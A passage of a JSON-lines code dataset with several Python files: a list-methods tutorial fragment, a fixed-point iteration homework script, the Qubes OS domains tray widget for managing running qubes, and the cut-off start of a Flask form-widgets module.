[11,22,33,22,44]\nli6.remove(33)\nprint(li6)\n# deletion commands, PS: pop remove del li[0] del li[7:9] clear\n\n# 10. reverse the current list\nli7 = [11,22,33,22,44]\nli7.reverse()\nprint(li7)\n\n# 11. sort the list\nli8 = [11,99,66,33,55,77]\nli8.sort()\nprint(li8)\nli9 = [11,99,66,33,55,77]\nli9.sort(reverse= True)\nprint(li9)\n### TODO\n#cap\n#key\n#sorted\nfor i in range(1,10):\n print(i)","sub_path":"37.列表灰魔法:list类中提供的方法.py","file_name":"37.列表灰魔法:list类中提供的方法.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"485109709","text":"# Author: Justin Overstreet\n# Date: August 31, 2019\n# Program: Fixed-point iteration test method\n# Purpose: Numerical Methods Homework 2, Problem 3a, solution finding.\n\nimport math\n\n# Math expression to evaluate.\nf = lambda x: math.pi + math.sin(x)/2\n\n# Initial variables.\np0 = 0\nn = 30\ntol = 10e-2\nitr = 1\n\n# Iterative loop.\nwhile(itr <= n):\n p = f(p0)\n if (abs(p-p0) < tol):\n print(p)\n break\n else:\n itr = itr + 1\n p0 = p\n\n# Resulting solution after 3 iterations: P = 3.141592653589793","sub_path":"Homework 2/FixedPointTest3.py","file_name":"FixedPointTest3.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"520603772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=wrong-import-position,import-error,superfluous-parens\n''' A menu listing domains '''\nimport abc\nimport asyncio\nimport subprocess\nimport sys\nimport os\nimport threading\nimport traceback\n\nimport qubesadmin\nimport qubesadmin.events\nimport qui.utils\nimport qui.decorators\n\nfrom qubesadmin import exc\n\nimport gi # isort:skip\ngi.require_version('Gtk', '3.0') # isort:skip\nfrom gi.repository import Gio, Gtk, GObject, GLib # isort:skip\n\nimport gbulb\ngbulb.install()\n\nimport gettext\nt = gettext.translation(\"desktop-linux-manager\", fallback=True)\n_ = t.gettext\n\nSTATE_DICTIONARY = {\n 'domain-pre-start': 'Transient',\n 'domain-start': 'Running',\n 'domain-start-failed': 'Halted',\n 'domain-paused': 'Paused',\n 'domain-unpaused': 'Running',\n    
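# Events with no entry in this map fall back to vm.get_power_state()\n    # (see add_domain_item() and update_domain_item() below).\n    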
'domain-shutdown': 'Halted',\n 'domain-pre-shutdown': 'Transient',\n 'domain-shutdown-failed': 'Running'\n}\n\n\nclass IconCache:\n def __init__(self):\n self.icon_files = {\n 'pause': 'media-playback-pause',\n 'terminal': 'utilities-terminal',\n 'preferences': 'preferences-system',\n 'kill': 'media-record',\n 'shutdown': 'media-playback-stop',\n 'unpause': 'media-playback-start',\n 'files': 'system-file-manager',\n 'restart': 'edit-redo'\n }\n self.icons = {}\n\n def get_icon(self, icon_name):\n if icon_name in self.icons:\n icon = self.icons[icon_name]\n else:\n icon = Gtk.IconTheme.get_default().load_icon(\n self.icon_files[icon_name], 16, 0)\n self.icons[icon_name] = icon\n return icon\n\n\ndef show_error(title, text):\n dialog = Gtk.MessageDialog(\n None, 0, Gtk.MessageType.ERROR, Gtk.ButtonsType.OK)\n dialog.set_title(title)\n dialog.set_markup(text)\n dialog.connect(\"response\", lambda *x: dialog.destroy())\n GLib.idle_add(dialog.show)\n\n\nclass VMActionMenuItem(Gtk.ImageMenuItem):\n def __init__(self, vm, icon_cache, icon_name, label):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(icon_cache.get_icon(icon_name))\n\n self.set_image(img)\n self.set_label(label)\n\n self.connect(\n 'activate', self.instantiate_thread_with_function)\n\n @abc.abstractmethod\n def perform_action(self):\n \"\"\"\n Action this item should perform.\n \"\"\"\n\n def instantiate_thread_with_function(self, *_args, **_kwargs):\n \"\"\"Make a thread to run potentially slow processes like vm.kill in the\n background\"\"\"\n thread = threading.Thread(target=self.perform_action)\n thread.start()\n\n\nclass PauseItem(VMActionMenuItem):\n ''' Pause menu Item. When activated pauses the domain. '''\n\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'pause', _('Emergency pause'))\n\n def perform_action(self):\n try:\n self.vm.pause()\n except exc.QubesException as ex:\n show_error(_(\"Error pausing qube\"),\n _(\"The following error occurred while \"\n \"attempting to pause qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass UnpauseItem(VMActionMenuItem):\n ''' Unpause menu Item. When activated unpauses the domain. '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'unpause', _('Unpause'))\n\n def perform_action(self):\n try:\n self.vm.unpause()\n except exc.QubesException as ex:\n show_error(_(\"Error unpausing qube\"),\n _(\"The following error occurred while attempting \"\n \"to unpause qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass ShutdownItem(VMActionMenuItem):\n ''' Shutdown menu Item. When activated shuts down the domain. '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'shutdown', _('Shutdown'))\n\n def perform_action(self):\n try:\n self.vm.shutdown()\n except exc.QubesException as ex:\n show_error(_(\"Error shutting down qube\"),\n _(\"The following error occurred while attempting to \"\n \"shut down qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass RestartItem(Gtk.ImageMenuItem):\n ''' Restart menu Item. When activated shuts down the domain and\n then starts it again. 
'''\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(icon_cache.get_icon('restart'))\n\n self.set_image(img)\n self.set_label(_('Restart'))\n self.restart_thread = None\n\n self.connect('activate', self.restart)\n\n def restart(self, *_args, **_kwargs):\n asyncio.ensure_future(self.perform_restart())\n\n async def perform_restart(self):\n try:\n self.vm.shutdown()\n while self.vm.is_running():\n await asyncio.sleep(1)\n proc = await asyncio.create_subprocess_exec(\n 'qvm-start', self.vm.name, stderr=subprocess.PIPE)\n _stdout, stderr = await proc.communicate()\n if proc.returncode != 0:\n raise exc.QubesException(stderr)\n except exc.QubesException as ex:\n show_error(_(\"Error restarting qube\"),\n _(\"The following error occurred while attempting to \"\n \"restart qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass KillItem(VMActionMenuItem):\n ''' Kill domain menu Item. When activated kills the domain. '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'kill', _('Kill'))\n\n def perform_action(self, *_args, **_kwargs):\n try:\n self.vm.kill()\n except exc.QubesException as ex:\n show_error(_(\"Error shutting down qube\"),\n _(\"The following error occurred while attempting to shut \"\n \"down qube {0}:\\n{1}\").format(self.vm.name, str(ex)))\n\n\nclass PreferencesItem(VMActionMenuItem):\n ''' Preferences menu Item. When activated shows preferences dialog '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'preferences', _('Settings'))\n\n def perform_action(self):\n # pylint: disable=consider-using-with\n subprocess.Popen(['qubes-vm-settings', self.vm.name])\n\n\nclass LogItem(Gtk.ImageMenuItem):\n def __init__(self, name, path):\n super().__init__()\n self.path = path\n\n img = Gtk.Image.new_from_file(\n \"/usr/share/icons/HighContrast/16x16/apps/logviewer.png\")\n\n self.set_image(img)\n self.set_label(name)\n\n self.connect('activate', self.launch_log_viewer)\n\n def launch_log_viewer(self, *_args, **_kwargs):\n # pylint: disable=consider-using-with\n subprocess.Popen(['qubes-log-viewer', self.path])\n\n\nclass RunTerminalItem(Gtk.ImageMenuItem):\n ''' Run Terminal menu Item. When activated runs a terminal emulator. '''\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(icon_cache.get_icon('terminal'))\n\n self.set_image(img)\n self.set_label(_('Run Terminal'))\n\n self.connect('activate', self.run_terminal)\n\n def run_terminal(self, _item):\n try:\n self.vm.run_service('qubes.StartApp+qubes-run-terminal')\n except exc.QubesException as ex:\n show_error(_(\"Error starting terminal\"),\n _(\"The following error occurred while attempting to \"\n \"run terminal {0}:\\n{1}\").format(self.vm.name, str(ex)))\n\n\nclass OpenFileManagerItem(Gtk.ImageMenuItem):\n \"\"\"Attempts to open a file manager in the VM. 
If it fails, displays an\n error message.\"\"\"\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(\n icon_cache.get_icon('files'))\n\n self.set_image(img)\n self.set_label(_('Open File Manager'))\n\n self.connect('activate', self.open_file_manager)\n\n def open_file_manager(self, _item):\n try:\n self.vm.run_service('qubes.StartApp+qubes-open-file-manager')\n except exc.QubesException as ex:\n show_error(_(\"Error opening file manager\"),\n _(\"The following error occurred while attempting to \"\n \"open file manager {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass InternalInfoItem(Gtk.MenuItem):\n ''' Insensitive menu item that explains what an internal qube is;\n shown in place of the usual actions. '''\n\n def __init__(self):\n super().__init__()\n self.label = Gtk.Label(xalign=0)\n self.label.set_markup(_(\n '<b>Internal qube</b>'))\n self.set_tooltip_text(\n 'Internal qubes are used by the operating system. Do not modify'\n ' them or run programs in them unless you really '\n 'know what you are doing.')\n self.add(self.label)\n self.set_sensitive(False)\n\n\nclass StartedMenu(Gtk.Menu):\n ''' The sub-menu for a started domain'''\n\n def __init__(self, vm, app, icon_cache):\n super().__init__()\n self.vm = vm\n self.app = app\n\n self.add(OpenFileManagerItem(self.vm, icon_cache))\n self.add(RunTerminalItem(self.vm, icon_cache))\n self.add(PreferencesItem(self.vm, icon_cache))\n self.add(PauseItem(self.vm, icon_cache))\n self.add(ShutdownItem(self.vm, icon_cache))\n if self.vm.klass != 'DispVM' or not self.vm.auto_cleanup:\n self.add(RestartItem(self.vm, icon_cache))\n\n self.show_all()\n\n\nclass PausedMenu(Gtk.Menu):\n ''' The sub-menu for a paused domain'''\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n self.add(PreferencesItem(self.vm, icon_cache))\n self.add(UnpauseItem(self.vm, icon_cache))\n self.add(KillItem(self.vm, icon_cache))\n\n self.show_all()\n\n\nclass DebugMenu(Gtk.Menu):\n ''' Sub-menu providing multiple MenuItem for domain logs. 
'''\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n self.add(PreferencesItem(self.vm, icon_cache))\n\n logs = [\n (_(\"Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \".log\"),\n (_(\"QEMU Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \"-dm.log\"),\n ]\n\n for name, path in logs:\n if os.path.isfile(path):\n self.add(LogItem(name, path))\n\n self.add(KillItem(self.vm, icon_cache))\n\n self.show_all()\n\n\nclass InternalMenu(Gtk.Menu):\n \"\"\"Sub-menu for Internal qubes\"\"\"\n def __init__(self, vm, icon_cache, working_correctly=True):\n \"\"\"\n :param vm: relevant Internal qube\n :param icon_cache: IconCache object\n :param working_correctly: if True, the VM should have a Shutdown\n option; otherwise, have a Kill option\n \"\"\"\n super().__init__()\n self.vm = vm\n\n self.add(InternalInfoItem())\n\n logs = [\n (_(\"Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \".log\"),\n (_(\"QEMU Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \"-dm.log\"),\n ]\n\n for name, path in logs:\n if os.path.isfile(path):\n self.add(LogItem(name, path))\n\n if working_correctly:\n self.add(ShutdownItem(self.vm, icon_cache))\n else:\n self.add(KillItem(self.vm, icon_cache))\n\n self.show_all()\n\n\ndef run_manager(_item):\n # pylint: disable=consider-using-with\n subprocess.Popen(['qubes-qube-manager'])\n\n\nclass QubesManagerItem(Gtk.ImageMenuItem):\n def __init__(self):\n super().__init__()\n\n self.set_image(Gtk.Image.new_from_icon_name('qubes-logo-icon',\n Gtk.IconSize.MENU))\n\n self.set_label(_('Open Qube Manager'))\n\n self.connect('activate', run_manager)\n\n self.show_all()\n\n\nclass DomainMenuItem(Gtk.ImageMenuItem):\n def __init__(self, vm, app, icon_cache, state=None):\n super().__init__()\n self.vm = vm\n self.app = app\n self.icon_cache = icon_cache\n # set vm := None to make this output headers.\n # Header menu item reuses the domain menu item code\n # so headers are aligned with the columns.\n\n self.decorator = qui.decorators.DomainDecorator(vm)\n\n hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n # hbox.set_homogeneous(True)\n\n namebox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n self.name = self.decorator.name()\n namebox.pack_start(self.name, True, True, 0)\n self.spinner = Gtk.Spinner()\n namebox.pack_start(self.spinner, False, True, 0)\n\n hbox.pack_start(namebox, True, True, 0)\n\n mem_cpu_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n # mem_cpu_box.set_homogeneous(True)\n self.memory = self.decorator.memory()\n mem_cpu_box.pack_start(self.memory, False, True, 0)\n self.cpu = self.decorator.cpu()\n mem_cpu_box.pack_start(self.cpu, False, True, 0)\n\n hbox.pack_start(mem_cpu_box, False, True, 0)\n\n self.add(hbox)\n\n if self.vm is None: # if header\n self.set_reserve_indicator(True) # align with submenu triangles\n self.cpu.update_state(header=True)\n self.memory.update_state(header=True)\n self.show_all() # header should always be visible\n elif self.vm.klass == 'AdminVM': # no submenu for AdminVM\n self.set_reserve_indicator(True) # align with submenu triangles\n else:\n if not state:\n self.update_state(self.vm.get_power_state())\n else:\n self.update_state(state)\n self.set_label_icon()\n\n def set_label_icon(self):\n self.set_image(self.decorator.icon())\n\n def _set_submenu(self, state):\n if self.vm.features.get('internal', False):\n submenu = InternalMenu(self.vm, self.icon_cache,\n working_correctly=(state == 'Running'))\n elif state == 'Running':\n submenu = 
StartedMenu(self.vm, self.app, self.icon_cache)\n elif state == 'Paused':\n submenu = PausedMenu(self.vm, self.icon_cache)\n else:\n submenu = DebugMenu(self.vm, self.icon_cache)\n # This is a workaround for a bug in Gtk which occurs when a\n # submenu is replaced while it is open.\n # see https://gitlab.gnome.org/GNOME/gtk/issues/885\n current_submenu = self.get_submenu()\n if current_submenu:\n current_submenu.grab_remove()\n self.set_submenu(submenu)\n\n def show_spinner(self):\n self.spinner.start()\n self.spinner.set_no_show_all(False)\n self.spinner.show()\n self.show_all()\n\n def hide_spinner(self):\n self.spinner.stop()\n self.spinner.set_no_show_all(True)\n self.spinner.hide()\n\n def update_state(self, state):\n vm_klass = getattr(self.vm, 'klass', None)\n\n if not self.vm or vm_klass == 'AdminVM':\n # it's a header or an AdminVM, no need to do anything\n return\n\n if not vm_klass:\n # it's a DispVM in a very fragile state; just make sure to add\n # correct submenu\n self._set_submenu(state)\n return\n\n # if VM is not running, hide it\n if state == 'Halted':\n self.hide()\n return\n self.show_all()\n\n if state in ['Running', 'Paused']:\n self.hide_spinner()\n else:\n self.show_spinner()\n colormap = {'Paused': 'grey', 'Crashed': 'red', 'Transient': 'red'}\n if state in colormap:\n # colour the name according to the current state\n self.name.label.set_markup(\n f'<span foreground=\"{colormap[state]}\">{self.vm.name}</span>')\n else:\n self.name.label.set_label(self.vm.name)\n\n self._set_submenu(state)\n\n def update_stats(self, memory_kb, cpu_usage):\n self.memory.update_state(int(memory_kb))\n self.cpu.update_state(int(cpu_usage))\n\n\nclass DomainTray(Gtk.Application):\n ''' A tray icon application listing all but halted domains. '''\n\n def __init__(self, app_name, qapp, dispatcher, stats_dispatcher):\n super().__init__()\n self.qapp = qapp\n self.dispatcher = dispatcher\n self.stats_dispatcher = stats_dispatcher\n\n self.widget_icon: Gtk.StatusIcon = Gtk.StatusIcon()\n self.widget_icon.set_from_icon_name('qui-domains-scalable')\n self.widget_icon.connect('button-press-event', self.show_menu)\n self.widget_icon.set_tooltip_markup(\n _('<b>Qubes Domains</b>\\nView and manage running domains.'))\n\n self.tray_menu = Gtk.Menu()\n\n self.icon_cache = IconCache()\n\n self.menu_items = {}\n\n self.unpause_all_action = Gio.SimpleAction.new('do-unpause-all', None)\n self.unpause_all_action.connect('activate', self.do_unpause_all)\n self.add_action(self.unpause_all_action)\n self.pause_notification_out = False\n\n # add refreshing tooltips with storage info\n GObject.timeout_add_seconds(120, self.refresh_tooltips)\n\n self.register_events()\n self.set_application_id(app_name)\n self.register() # register Gtk Application\n\n def register_events(self):\n self.dispatcher.add_handler('connection-established', self.refresh_all)\n self.dispatcher.add_handler('domain-pre-start', self.update_domain_item)\n self.dispatcher.add_handler('domain-start', self.update_domain_item)\n self.dispatcher.add_handler('domain-start-failed',\n self.update_domain_item)\n self.dispatcher.add_handler('domain-paused', self.update_domain_item)\n self.dispatcher.add_handler('domain-unpaused', self.update_domain_item)\n self.dispatcher.add_handler('domain-shutdown', self.update_domain_item)\n self.dispatcher.add_handler('domain-pre-shutdown',\n self.update_domain_item)\n self.dispatcher.add_handler('domain-shutdown-failed',\n self.update_domain_item)\n\n self.dispatcher.add_handler('domain-add', self.add_domain_item)\n self.dispatcher.add_handler('domain-delete', self.remove_domain_item)\n\n        
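# All dispatcher callbacks share the signature handler(subject, event,\n        # **kwargs). The registrations above keep the menu items themselves in\n        # sync; the groups below only emit notifications and track pause state.\n        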
self.dispatcher.add_handler('domain-pre-start', self.emit_notification)\n self.dispatcher.add_handler('domain-start', self.emit_notification)\n self.dispatcher.add_handler('domain-start-failed',\n self.emit_notification)\n self.dispatcher.add_handler('domain-pre-shutdown',\n self.emit_notification)\n self.dispatcher.add_handler('domain-shutdown', self.emit_notification)\n self.dispatcher.add_handler('domain-shutdown-failed',\n self.emit_notification)\n\n self.dispatcher.add_handler('domain-start', self.check_pause_notify)\n self.dispatcher.add_handler('domain-paused', self.check_pause_notify)\n self.dispatcher.add_handler('domain-unpaused', self.check_pause_notify)\n self.dispatcher.add_handler('domain-shutdown', self.check_pause_notify)\n\n self.dispatcher.add_handler('domain-feature-set:updates-available',\n self.feature_change)\n self.dispatcher.add_handler('domain-feature-delete:updates-available',\n self.feature_change)\n self.dispatcher.add_handler('property-set:netvm', self.property_change)\n self.dispatcher.add_handler('property-set:label', self.property_change)\n\n self.stats_dispatcher.add_handler('vm-stats', self.update_stats)\n\n def show_menu(self, _unused, event):\n self.tray_menu.popup_at_pointer(event) # None means current event\n\n def emit_notification(self, vm, event, **kwargs):\n notification = Gio.Notification.new(_(\n \"Qube Status: {}\"). format(vm.name))\n notification.set_priority(Gio.NotificationPriority.NORMAL)\n\n if event == 'domain-start-failed':\n notification.set_body(_('Qube {} has failed to start: {}').format(\n vm.name, kwargs['reason']))\n notification.set_priority(Gio.NotificationPriority.HIGH)\n notification.set_icon(\n Gio.ThemedIcon.new('dialog-warning'))\n elif event == 'domain-pre-start':\n notification.set_body(_('Qube {} is starting.').format(vm.name))\n elif event == 'domain-start':\n notification.set_body(_('Qube {} has started.').format(vm.name))\n elif event == 'domain-pre-shutdown':\n notification.set_body(\n _('Qube {} is attempting to shut down.').format(vm.name))\n elif event == 'domain-shutdown':\n notification.set_body(_('Qube {} has shut down.').format(vm.name))\n elif event == 'domain-shutdown-failed':\n notification.set_body(\n _('Qube {} failed to shut down: {}').format(\n vm.name, kwargs['reason']))\n notification.set_priority(Gio.NotificationPriority.HIGH)\n notification.set_icon(\n Gio.ThemedIcon.new('dialog-warning'))\n else:\n return\n self.send_notification(None, notification)\n\n def emit_paused_notification(self):\n if not self.pause_notification_out:\n notification = Gio.Notification.new(_(\"Your qubes have been \"\n \"paused!\"))\n notification.set_body(_(\n \"All your qubes are currently paused. If this was an accident, \"\n \"simply click \\\"Unpause All\\\" to unpause them. 
Otherwise, \"\n \"you can unpause individual qubes via the Qubes Domains \"\n \"tray widget.\"))\n notification.set_icon(\n Gio.ThemedIcon.new('dialog-warning'))\n notification.add_button(_('Unpause All'), 'app.do-unpause-all')\n notification.set_priority(Gio.NotificationPriority.HIGH)\n self.send_notification('vms-paused', notification)\n self.pause_notification_out = True\n\n def withdraw_paused_notification(self):\n if self.pause_notification_out:\n self.withdraw_notification('vms-paused')\n self.pause_notification_out = False\n\n def do_unpause_all(self, _vm, *_args, **_kwargs):\n for vm_name in self.menu_items:\n try:\n self.qapp.domains[vm_name].unpause()\n except exc.QubesException:\n # we may not have permission to do that\n pass\n\n def check_pause_notify(self, _vm, _event, **_kwargs):\n if self.have_running_and_all_are_paused():\n self.emit_paused_notification()\n else:\n self.withdraw_paused_notification()\n\n def have_running_and_all_are_paused(self):\n found_paused = False\n for vm in self.qapp.domains:\n if vm.klass != 'AdminVM':\n if vm.is_running():\n if vm.is_paused():\n # a running that is paused\n found_paused = True\n else:\n # found running that wasn't paused\n return False\n return found_paused\n\n def add_domain_item(self, _submitter, event, vm, **_kwargs):\n \"\"\"Add a DomainMenuItem to menu; if event is None, this was fired\n manually (not due to a domain-add event), and it is assumed the menu items\n are created in alphabetical order. Otherwise, this method will\n attempt to sort menu items correctly.\"\"\"\n # check if it already exists\n try:\n vm = self.qapp.domains[str(vm)]\n except KeyError:\n # the VM was not created successfully or was deleted before the\n # event was fully handled\n return\n if vm in self.menu_items:\n return\n\n state = STATE_DICTIONARY.get(event)\n if not state:\n try:\n state = vm.get_power_state()\n except exc.QubesException:\n # VM might have been already destroyed\n if vm not in self.qapp.domains:\n return\n # or we might not have permission to access its power state\n state = 'Halted'\n\n domain_item = DomainMenuItem(vm, self, self.icon_cache, state=state)\n if not event: # menu item creation at widget start; we can assume\n # menu items are created in alphabetical order\n self.tray_menu.add(domain_item)\n else:\n position = 0\n for i in self.tray_menu: # pylint: disable=not-an-iterable\n if not hasattr(i, 'vm'): # we reached the end\n break\n if not i.vm: # the header should be skipped\n position += 1\n continue\n if i.vm.klass == 'AdminVM':\n # AdminVM(s) should be skipped\n position += 1\n continue\n if i.vm.name > vm.name:\n # we reached correct alphabetical placement for the VM\n break\n position += 1\n self.tray_menu.insert(domain_item, position)\n self.menu_items[vm] = domain_item\n\n def property_change(self, vm, event, *_args, **_kwargs):\n if vm not in self.menu_items:\n return\n if event == 'property-set:netvm':\n self.menu_items[vm].name.update_tooltip(netvm_changed=True)\n elif event == 'property-set:label':\n self.menu_items[vm].set_label_icon()\n\n def feature_change(self, vm, *_args, **_kwargs):\n if vm not in self.menu_items:\n return\n self.menu_items[vm].name.update_updateable()\n\n def refresh_tooltips(self):\n for item in self.menu_items.values():\n if item.vm and item.is_visible():\n try:\n item.name.update_tooltip(storage_changed=True)\n except Exception: # pylint: disable=broad-except\n pass\n\n def remove_domain_item(self, _submitter, _event, vm, **_kwargs):\n if vm not in self.menu_items:\n return\n vm_widget = 
self.menu_items[vm]\n self.tray_menu.remove(vm_widget)\n del self.menu_items[vm]\n\n def handle_domain_shutdown(self, vm):\n try:\n if getattr(vm, 'klass', None) == 'TemplateVM':\n for menu_item in self.menu_items.values():\n try:\n if not menu_item.vm.is_running():\n # A VM based on this template can only be\n # outdated if the VM is currently running.\n continue\n except exc.QubesPropertyAccessError:\n continue\n if getattr(menu_item.vm, 'template', None) == vm and \\\n any(vol.is_outdated()\n for vol in menu_item.vm.volumes.values()):\n menu_item.name.update_outdated(True)\n except exc.QubesVMNotFoundError:\n # attribute not available anymore as VM was removed\n # in the meantime\n pass\n\n def update_domain_item(self, vm, event, **kwargs):\n ''' Update the menu item with the started menu for\n the specified vm in the tray'''\n try:\n item = self.menu_items[vm]\n except exc.QubesPropertyAccessError:\n print(_(\"Unexpected property access error\")) # req by @marmarek\n traceback.print_exc()\n self.remove_domain_item(vm, event, **kwargs)\n return\n except KeyError:\n self.add_domain_item(None, event, vm)\n if not vm in self.menu_items:\n # VM not added - already removed?\n return\n item = self.menu_items[vm]\n\n if event in STATE_DICTIONARY:\n state = STATE_DICTIONARY[event]\n else:\n try:\n state = vm.get_power_state()\n except Exception: # pylint: disable=broad-except\n # it's a fragile DispVM\n state = \"Transient\"\n\n item.update_state(state)\n\n if event == 'domain-shutdown':\n self.handle_domain_shutdown(vm)\n # if the VM was shut down, it is no longer outdated\n item.name.update_outdated(False)\n\n if event in ('domain-start', 'domain-pre-start'):\n # A newly started VM should not be outdated.\n item.name.update_outdated(False)\n item.show_all()\n if event == 'domain-shutdown':\n item.hide()\n\n def update_stats(self, vm, _event, **kwargs):\n if vm not in self.menu_items:\n return\n self.menu_items[vm].update_stats(\n kwargs['memory_kb'], kwargs['cpu_usage'])\n\n def initialize_menu(self):\n self.tray_menu.add(DomainMenuItem(None, self, self.icon_cache))\n\n # Add AdminVMS\n for vm in sorted([vm for vm in self.qapp.domains\n if vm.klass == \"AdminVM\"]):\n self.add_domain_item(None, None, vm)\n\n # and the rest of them\n for vm in sorted([vm for vm in self.qapp.domains\n if vm.klass != 'AdminVM']):\n self.add_domain_item(None, None, vm)\n\n for item in self.menu_items.values():\n try:\n if item.vm and item.vm.is_running():\n item.name.update_tooltip(storage_changed=True)\n item.show_all()\n else:\n item.hide()\n except exc.QubesPropertyAccessError:\n item.hide()\n\n self.tray_menu.add(Gtk.SeparatorMenuItem())\n self.tray_menu.add(QubesManagerItem())\n\n self.connect('shutdown', self._disconnect_signals)\n\n def refresh_all(self, _subject, _event, **_kwargs):\n items_to_delete = []\n for vm in self.menu_items:\n if vm not in self.qapp.domains:\n items_to_delete.append(vm)\n for vm in items_to_delete:\n self.remove_domain_item(None, None, vm)\n for vm in self.qapp.domains:\n self.update_domain_item(vm, '')\n\n def run(self): # pylint: disable=arguments-differ\n self.initialize_menu()\n\n def _disconnect_signals(self, _event):\n self.dispatcher.remove_handler('connection-established',\n self.refresh_all)\n self.dispatcher.remove_handler('domain-pre-start',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-start', self.update_domain_item)\n self.dispatcher.remove_handler('domain-start-failed',\n self.update_domain_item)\n 
self.dispatcher.remove_handler('domain-paused', self.update_domain_item)\n self.dispatcher.remove_handler('domain-unpaused',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-shutdown',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-pre-shutdown',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-shutdown-failed',\n self.update_domain_item)\n\n self.dispatcher.remove_handler('domain-add', self.add_domain_item)\n self.dispatcher.remove_handler('domain-delete', self.remove_domain_item)\n\n self.dispatcher.remove_handler('domain-pre-start',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-start', self.emit_notification)\n self.dispatcher.remove_handler('domain-start-failed',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-pre-shutdown',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-shutdown',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-shutdown-failed',\n self.emit_notification)\n\n self.dispatcher.remove_handler('domain-start', self.check_pause_notify)\n self.dispatcher.remove_handler('domain-paused', self.check_pause_notify)\n self.dispatcher.remove_handler('domain-unpaused',\n self.check_pause_notify)\n self.dispatcher.remove_handler('domain-shutdown',\n self.check_pause_notify)\n\n self.dispatcher.remove_handler('domain-feature-set:updates-available',\n self.feature_change)\n self.dispatcher.remove_handler(\n 'domain-feature-delete:updates-available', self.feature_change)\n self.dispatcher.remove_handler('property-set:netvm',\n self.property_change)\n self.dispatcher.remove_handler('property-set:label',\n self.property_change)\n\n self.stats_dispatcher.remove_handler('vm-stats', self.update_stats)\n\n\ndef main():\n ''' main function '''\n qapp = qubesadmin.Qubes()\n dispatcher = qubesadmin.events.EventsDispatcher(qapp)\n stats_dispatcher = qubesadmin.events.EventsDispatcher(\n qapp, api_method='admin.vm.Stats')\n app = DomainTray(\n 'org.qubes.qui.tray.Domains', qapp, dispatcher, stats_dispatcher)\n app.run()\n\n loop = asyncio.get_event_loop()\n tasks = [\n asyncio.ensure_future(dispatcher.listen_for_events()),\n asyncio.ensure_future(stats_dispatcher.listen_for_events()),\n ]\n\n return qui.utils.run_asyncio_and_show_errors(loop, tasks,\n \"Qubes Domains Widget\")\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"qui/tray/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":34521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"620443706","text":"from flask.ext.wtf import Form\nfrom flask import render_template\nfrom wtforms.widgets import TextArea, TextInput\nfrom wtforms.fields import HiddenField, FileField\nfrom wtforms import fields\nfrom appshell.markup import element, button, link_button, GridColumn\nfrom markupsafe import Markup\nfrom flask.ext.babelex import Babel, Domain\nfrom itertools import chain\nfrom hashlib import sha256\nfrom appshell.widgets import ClientSideTabbar\nfrom appshell import View\nfrom appshell.templates import single_view\n\nmydomain = Domain('appshell')\n_ = mydomain.gettext\nlazy_gettext = mydomain.lazy_gettext\n\n\nclass OrderedForm(Form):\n def __iter__(self):\n fields = list(super(OrderedForm, self).__iter__())\n field_order = getattr(self, 'field_order', None)\n if field_order:\n temp_fields = []\n for name in field_order:\n if name == '*':\n temp_fields.extend([f for f in fields\n if f.name not in field_order])\n else:\n 
temp_fields.append([f for f in fields\n if f.name == name][0])\n fields = temp_fields\n return iter(fields)\n \n field_order = ['*','ok']\n\nclass BootstrapMarkdown(TextArea):\n def __init__(self, rows=10):\n self.rows = rows\n\n def __call__(self, field, **kwargs):\n kwargs['rows'] = self.rows\n c = kwargs.pop('class', '') or kwargs.pop('class_', '')\n kwargs['class'] = u'%s %s' % (\"bootstrap-markdown\", c)\n return super(BootstrapMarkdown, self).__call__(field, **kwargs)\n\nclass DateWidget(TextInput):\n def __call__(self, field, **kwargs):\n i = super(DateWidget, self).__call__(field, **kwargs)\n \n i = Markup(\"\"\"
    <div class=\"input-group date\">\n {} <span class=\"input-group-addon\"><span class=\"glyphicon glyphicon-calendar\"></span></span>\n </div>\n
